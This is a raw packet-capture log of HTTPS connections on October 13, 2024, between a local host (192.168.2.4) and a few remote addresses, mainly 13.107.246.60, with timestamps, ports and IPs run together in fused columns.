                                                                                                                          Oct 13, 2024 18:21:54.086126089 CEST4434990713.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:54.086149931 CEST49907443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:54.086198092 CEST49907443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:54.086517096 CEST49907443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:54.086538076 CEST4434990713.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:54.086549044 CEST49907443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:54.086555004 CEST4434990713.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:54.092987061 CEST49912443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:54.093039036 CEST4434991213.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:54.093137026 CEST49912443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:54.093528032 CEST49912443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:54.093566895 CEST4434991213.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:54.169744015 CEST4434990813.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:54.169898033 CEST4434990813.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:54.169970036 CEST49908443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:54.170289040 CEST49908443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:54.170320988 CEST4434990813.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:54.174892902 CEST49913443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:54.174982071 CEST4434991313.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:54.175090075 CEST49913443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:54.175296068 CEST49913443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:54.175334930 CEST4434991313.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:54.247566938 CEST4434990913.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:54.248537064 CEST49909443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:54.248610973 CEST4434990913.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:54.249361992 CEST49909443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:54.249377012 CEST4434990913.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:54.319463015 CEST4434991013.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:54.319942951 CEST49910443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:54.320003986 CEST4434991013.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:54.320586920 CEST49910443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:54.320600986 CEST4434991013.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:54.347924948 CEST4434990913.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:54.347966909 CEST4434990913.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:54.348007917 CEST4434990913.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:54.348032951 CEST49909443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:54.348081112 CEST49909443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:54.348395109 CEST49909443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:54.348395109 CEST49909443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:54.348431110 CEST4434990913.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:54.348453999 CEST4434990913.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:54.353579044 CEST49914443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:54.353631973 CEST4434991413.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:54.353859901 CEST49914443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:54.354096889 CEST49914443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:54.354127884 CEST4434991413.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:54.419759989 CEST4434991013.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:54.419950008 CEST4434991013.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:54.420026064 CEST49910443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:54.420377970 CEST49910443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:54.420418978 CEST4434991013.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:54.420447111 CEST49910443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:54.420461893 CEST4434991013.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:54.426048994 CEST49915443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:54.426085949 CEST4434991513.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:54.426187992 CEST49915443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:54.426323891 CEST49915443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:54.426337004 CEST4434991513.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:54.615942001 CEST49840443192.168.2.4172.217.16.196
                                                                                                                          Oct 13, 2024 18:21:54.615978003 CEST44349840172.217.16.196192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:54.641593933 CEST4434991113.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:54.642194986 CEST49911443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:54.642230034 CEST4434991113.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:54.642864943 CEST49911443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:54.642879963 CEST4434991113.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:54.741740942 CEST4434991213.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:54.742710114 CEST49912443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:54.742769957 CEST4434991213.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:54.743367910 CEST49912443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:54.743383884 CEST4434991213.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:54.745954037 CEST4434991113.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:54.746018887 CEST4434991113.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:54.746328115 CEST49911443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:54.749424934 CEST49911443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:54.749452114 CEST4434991113.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:54.807260990 CEST49916443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:54.807295084 CEST4434991613.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:54.807410955 CEST49916443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:54.819117069 CEST49916443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:54.819128990 CEST4434991613.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:54.831291914 CEST4434991313.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:54.833626032 CEST49913443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:54.833713055 CEST4434991313.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:54.835381985 CEST49913443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:54.835412979 CEST4434991313.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:54.843616962 CEST4434991213.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:54.843668938 CEST4434991213.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:54.843811989 CEST49912443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:54.844583035 CEST49912443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:54.844583035 CEST49912443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:54.844626904 CEST4434991213.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:54.844656944 CEST4434991213.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:54.855506897 CEST49917443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:54.855556965 CEST4434991713.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:54.855638027 CEST49917443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:54.857410908 CEST49917443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:54.857445002 CEST4434991713.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:54.932821989 CEST4434991313.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:54.932899952 CEST4434991313.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:54.932996988 CEST49913443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:54.933018923 CEST4434991313.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:54.933082104 CEST49913443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:54.934607983 CEST49913443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:54.934607983 CEST49913443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:54.934659004 CEST4434991313.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:54.934703112 CEST4434991313.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:54.940483093 CEST49918443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:54.940526962 CEST4434991813.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:54.941118002 CEST49918443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:54.941822052 CEST49918443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:54.941842079 CEST4434991813.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:55.020853043 CEST4434991413.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:55.021624088 CEST49914443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:55.021670103 CEST4434991413.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:55.022243977 CEST49914443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:55.022265911 CEST4434991413.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:55.078771114 CEST4434991513.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:55.079483986 CEST49915443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:55.079509020 CEST4434991513.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:55.080013037 CEST49915443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:55.080018044 CEST4434991513.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:55.121891022 CEST4434991413.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:55.122272968 CEST4434991413.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:55.122344971 CEST49914443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:55.122390032 CEST49914443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:55.122414112 CEST4434991413.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:55.122426987 CEST49914443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:55.122433901 CEST4434991413.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:55.125848055 CEST49919443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:55.125888109 CEST4434991913.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:55.125951052 CEST49919443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:55.126082897 CEST49919443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:55.126095057 CEST4434991913.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:55.179971933 CEST4434991513.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:55.180022001 CEST4434991513.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:55.180062056 CEST4434991513.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:55.180128098 CEST49915443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:55.180284977 CEST49915443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:55.180298090 CEST4434991513.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:55.180332899 CEST49915443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:55.180337906 CEST4434991513.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:55.183114052 CEST49920443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:55.183160067 CEST4434992013.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:55.183271885 CEST49920443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:55.183446884 CEST49920443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:55.183470011 CEST4434992013.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:55.477797985 CEST4434991613.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:55.492307901 CEST49916443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:55.492322922 CEST4434991613.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:55.497191906 CEST49916443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:55.497200012 CEST4434991613.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:55.505892992 CEST4434991713.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:55.507951975 CEST49917443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:55.507973909 CEST4434991713.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:55.508574009 CEST49917443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:55.508578062 CEST4434991713.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:55.605637074 CEST4434991613.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:55.605791092 CEST4434991613.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:55.605859041 CEST49916443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:55.606492043 CEST49916443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:55.606511116 CEST4434991613.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:55.606545925 CEST49916443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:55.606560946 CEST4434991613.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:55.608697891 CEST4434991713.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:55.608778954 CEST4434991713.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:55.608833075 CEST49917443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:55.609648943 CEST49917443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:55.609664917 CEST4434991713.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:55.611284971 CEST4434991813.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:55.612704039 CEST49918443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:55.612719059 CEST4434991813.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:55.613624096 CEST49918443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:55.613629103 CEST4434991813.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:55.617554903 CEST49921443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:55.617621899 CEST4434992113.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:55.617717028 CEST49921443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:55.618094921 CEST49921443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:55.618125916 CEST4434992113.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:55.618724108 CEST49922443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:55.618743896 CEST4434992213.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:55.618838072 CEST49922443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:55.619154930 CEST49922443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:55.619178057 CEST4434992213.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:55.711755991 CEST4434991813.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:55.711916924 CEST4434991813.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:55.712035894 CEST49918443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:55.712275982 CEST49918443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:55.712284088 CEST4434991813.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:55.712292910 CEST49918443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:55.712297916 CEST4434991813.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:55.716126919 CEST49923443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:55.716161966 CEST4434992313.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:55.716332912 CEST49923443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:55.716763973 CEST49923443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:55.716779947 CEST4434992313.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:55.800221920 CEST4434991913.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:55.801001072 CEST49919443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:55.801028967 CEST4434991913.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:55.802231073 CEST49919443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:55.802237988 CEST4434991913.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:55.834567070 CEST4434992013.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:55.835066080 CEST49920443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:55.835091114 CEST4434992013.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:55.835649014 CEST49920443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:55.835654974 CEST4434992013.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:55.903800011 CEST4434991913.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:55.903870106 CEST4434991913.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:55.903983116 CEST4434991913.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:55.904146910 CEST49919443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:55.904175043 CEST49919443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:55.904175043 CEST49919443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:55.904190063 CEST4434991913.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:55.904197931 CEST4434991913.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:55.908863068 CEST49924443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:55.908905983 CEST4434992413.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:55.908977985 CEST49924443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:55.909240961 CEST49924443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:55.909256935 CEST4434992413.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:55.935980082 CEST4434992013.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:55.936805010 CEST4434992013.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:55.936866999 CEST49920443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:55.937062979 CEST49920443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:55.937083006 CEST4434992013.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:55.937103033 CEST49920443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:55.937108994 CEST4434992013.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:55.941323996 CEST49925443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:55.941349983 CEST4434992513.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:55.941576004 CEST49925443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:55.941778898 CEST49925443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:55.941787958 CEST4434992513.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:56.274302006 CEST4434992213.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:56.275002956 CEST49922443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:56.275042057 CEST4434992213.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:56.275746107 CEST49922443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:56.275759935 CEST4434992213.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:56.293569088 CEST4434992113.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:56.293901920 CEST49921443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:56.293939114 CEST4434992113.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:56.294296026 CEST49921443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:56.294306993 CEST4434992113.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:56.373920918 CEST4434992213.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:56.374015093 CEST4434992213.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:56.374126911 CEST49922443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:56.374150038 CEST4434992213.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:56.374258995 CEST49922443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:56.374275923 CEST4434992213.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:56.374298096 CEST49922443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:56.374310017 CEST4434992213.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:56.374329090 CEST4434992213.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:56.376967907 CEST49926443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:56.377008915 CEST4434992613.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:56.377186060 CEST49926443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:56.377186060 CEST49926443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:56.377211094 CEST4434992613.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:56.383572102 CEST4434992313.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:56.383924007 CEST49923443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:56.383989096 CEST4434992313.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:56.384300947 CEST49923443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:56.384315968 CEST4434992313.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:56.398173094 CEST4434992113.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:56.398284912 CEST4434992113.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:56.398384094 CEST49921443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:56.398435116 CEST49921443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:56.398435116 CEST49921443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:56.398456097 CEST4434992113.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:56.398477077 CEST4434992113.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:56.400607109 CEST49927443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:56.400640011 CEST4434992713.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:56.400708914 CEST49927443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:56.400814056 CEST49927443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:56.400826931 CEST4434992713.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:56.486229897 CEST4434992313.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:56.486936092 CEST4434992313.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:56.487009048 CEST49923443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:56.487072945 CEST49923443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:56.487097979 CEST4434992313.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:56.487109900 CEST49923443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:56.487117052 CEST4434992313.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:56.489964962 CEST49928443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:56.490058899 CEST4434992813.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:56.490145922 CEST49928443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:56.490313053 CEST49928443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:56.490343094 CEST4434992813.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:56.563014984 CEST4434992413.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:56.563452005 CEST49924443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:56.563467979 CEST4434992413.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:56.563939095 CEST49924443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:56.563944101 CEST4434992413.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:56.622354031 CEST4434992513.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:56.622900963 CEST49925443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:56.622915030 CEST4434992513.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:56.623370886 CEST49925443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:56.623375893 CEST4434992513.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:56.665190935 CEST4434992413.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:56.665355921 CEST4434992413.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:56.665421963 CEST49924443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:56.665647984 CEST49924443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:56.665668964 CEST4434992413.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:56.665682077 CEST49924443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:56.665687084 CEST4434992413.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:56.669754982 CEST49929443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:56.669790983 CEST4434992913.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:56.669881105 CEST49929443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:56.670100927 CEST49929443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:56.670114994 CEST4434992913.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:56.727858067 CEST4434992513.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:56.728008032 CEST4434992513.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:56.728271961 CEST49925443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:56.728390932 CEST49925443192.168.2.413.107.246.60
